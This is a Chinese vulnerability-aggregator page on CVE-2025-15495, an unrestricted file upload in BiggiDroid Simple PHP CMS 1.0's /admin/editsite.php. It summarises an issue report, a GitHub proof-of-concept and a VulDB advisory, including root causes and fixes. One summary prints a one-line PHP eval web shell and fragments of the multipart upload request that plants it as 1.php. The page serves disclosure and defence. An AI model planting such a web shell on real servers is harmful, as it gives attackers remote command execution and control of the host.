# BiggiDroid editsite.php 无限制上传漏洞
## 概述
BiggiDroid Simple PHP CMS 1.0 中存在一个漏洞,影响 `/admin/editsite.php` 文件的某个未知功能。通过对 `image` 参数的操纵,可导致任意文件上传。
## 影响版本
BiggiDroid Simple PHP CMS 1.0
## 细节
漏洞存在于 `/admin/editsite.php` 文件中,`image` 参数未对上传文件进行有效验证和过滤,攻击者可利用该缺陷上传恶意文件(如PHP脚本),实现代码执行。
## 影响
攻击者可远程利用该漏洞上传任意文件,进而可能获取服务器控制权限。漏洞已被公开披露并具备可利用的攻击代码。厂商已提前被告知但未作出响应。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|---|---|---|
| 1 | CVE-2025-15495 - Arbitrary File Upload Leading to Remote Code Execution (RCE) | https://github.com/Asim-QAZi/RCE-Simplephpblog-biggiedroid | POC详情 |
标题: 陈康 · Issue #IDGO28 · hdert/ck - Gitee -- 🔗来源链接
标签:issue-tracking
神龙速读:
## 关键漏洞信息
- **无限制文件上传漏洞**:
- 描述:BiggiDroid Simple PHP CMS 的 `edit.php` 文件存在未限制的文件上传漏洞。
- **问题**:
- **未限制文件上传格式**:允许上传任意文件,包括`.php`文件。
- **攻击细节**:
- **上传的PHP文件**:
```php
<?php @eval($_POST['cmd']); ?>
```
- **攻击payload**:
```http
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=034g41vm76hkfiiidq7inng5a1
Content-Type: multipart/form-data
```
- **文件上传请求头**:
```http
-----WebKitFormBoundaryNidVxBANaJakijcD
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: application/octet-stream
-----WebKitFormBoundaryNidVxBANaJakijcD
```
- **后果**:
- 可以上传恶意PHP文件,利用服务器执行任意代码。
- 可见,攻击者已成功上传了一个名为`1.php`的 PHP文件,实现了远程代码执行。
标题: GitHub - Asim-QAZi/RCE-Simplephpblog-biggiedroid: CVE-2025-15495 - Arbitrary File Upload Leading to Remote Code Execution (RCE) -- 🔗来源链接
标签:exploit
神龙速读:
### 关键漏洞信息摘要
#### 漏洞ID
CVE-2025-15495
#### 漏洞类型
- 任意文件上传
- 无限制文件上传
- 远程代码执行 (RCE)
#### 危害等级
- 严重
#### CVSS评分 (预估): 9.8
#### 漏洞描述
Simple PHP Blog CMS 在其管理面板的 “网站LOGO上传” 功能中存在无限制文件上传漏洞。经过验证的攻击者能够以图像的伪装上传一个恶意的 PHP 文件,该文件会被存储在一个可访问的 Web 目录中,并被服务器执行,最终导致远程命令执行。
#### 影响组件
管理面板 → 更新网站LOGO
#### 问题
- 缺乏文件扩展名验证
- 缺乏MIME类型验证
- 缺乏服务器端文件内容检查
#### 漏洞演示 (PoC)
- 创建一个名为 shell.php 的恶意 PHP 文件
- 通过管理面板上传该文件
- 访问上传的 Web Shell 并执行系统命令,验证 RCE 成功
#### 影响范围
- 可执行任意操作系统命令
- 可读取敏感配置文件
- 可修改或删除应用程序数据
- 可上传持久后门
- 可完全控制托管服务器
#### 根因分析
- 缺少文件扩展名白名单
- 缺少MIME类型强制
- 直接使用用户提供的文件名
- 上传目录允许PHP执行
- 缺少 .htaccess 服务器加固
#### 推荐修复措施
1. 限制文件扩展名
2. 验证MIME类型
3. 重命名上传文件 (使用随机UUID,不要信任用户文件名)
标题: Submit #726040: BiggiDroid Simple PHP CMS 1.0 Unrestricted Upload -- 🔗来源链接
标签:third-party-advisory
神龙速读:
**Key Information About the Vulnerability**
- **Title**: BiggiDroid Simple PHP CMS 1.0 Unrestricted Upload
- **Description**: The simple PHP Blog CMS is vulnerable to an unrestricted arbitrary file upload vulnerability in the admin panel's Site Logo update functionality. The application fails to properly validate uploaded files, allowing attackers to upload malicious PHP files instead of legitimate image files.
- **Impact**: Uploaded files are stored in a web-accessible directory with no restriction on file type, extension, or MIME validation. Due to an execution of arbitrary system commands.
- **Consequence**: Successful exploitation results in remote code execution (RCE) on the underlying server, potentially leading to full system compromise, data theft, persistence installation, or service disruption.
- **Reason**: This issue occurs due to missing server-side validation, unsafe handling of user-controlled filenames, and a lack of execution restrictions on uploaded content.
- **Source**: https://github.com/Asim-QAZi/RCE-Simplephpblog-bigiedroid
- **Submitter**: moasim (UID 93970)
- **Submission Date**: 12/29/2025 07:36 PM
- **Moderation Date**: 01/09/2026 12:37 PM
- **Status**: Duplicate
- **VulDB Entry**: 2340273 [BiggiDroid Simple PHP CMS 1.0 /admin/editsite.php image unrestricted upload]
暂无评论